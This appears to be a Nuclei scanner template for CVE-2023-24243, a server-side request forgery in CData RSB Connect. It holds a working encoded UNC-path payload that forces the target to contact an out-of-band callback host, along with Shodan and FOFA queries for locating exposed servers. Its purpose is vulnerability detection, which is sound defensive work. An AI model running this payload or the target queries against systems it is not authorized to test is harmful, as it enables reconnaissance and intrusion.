nuclei-templates/http/cves/2023/CVE-2023-24243.yaml

37 lines
944 B
YAML

id: CVE-2023-24243
info:
name: CData RSB Connect v22.0.8336 - Server Side Request Forgery
author: ritikchaddha
severity: high
description: |
CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).
reference:
- https://twitter.com/W01fh4cker/status/1669890019191037952
- https://gist.github.com/d3vc0r3/6460a5f006e32a2ebffe739e411ab1b8
- https://nvd.nist.gov/vuln/detail/CVE-2023-24243
classification:
cve-id: CVE-2023-24243
metadata:
fofa-query: icon_hash="163538942"
max-request: 1
shodan-query: http.favicon.hash:163538942
verified: true
tags: cve,cve2023,cdata,rsb,ssrf
http:
- method: GET
path:
- "{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: status
status:
- 404